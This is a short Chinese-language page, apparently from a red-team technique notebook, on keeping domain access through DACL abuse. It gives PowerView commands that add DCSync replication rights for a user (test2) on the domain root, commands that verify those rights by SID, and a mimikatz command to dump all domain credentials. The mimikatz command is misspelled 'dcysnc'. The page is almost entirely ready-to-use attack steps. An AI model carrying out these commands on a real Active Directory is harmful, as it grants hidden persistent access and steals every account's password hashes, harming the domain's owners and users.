DACL权限维持

给账户test2添加DCSync的权限

Add-DomainObjectAcl -TargetIdentity "DC=fbi,DC=gov" -PrincipalIdentity test2 -Rights DCSync -Verbose

查看复制目录更改所有项(1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)+复制目录更改(1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)是否添加

Get-DomainUser -Identity test2 -Properties objectsid
# 查看test2的sid

Get-DomainObjectAcl -Identity "DC=fbi,DC=gov" | ?{$_.SecurityIdentifier -match "S-1-5-21-124841762-3349575232-3850797422-3610"}
# 查看对应sid用户的权限

进行dcsync

mimikatz
lsadump::dcysnc /all /csv

Previous白银票据 Next凭据获取

Last updated 2 years ago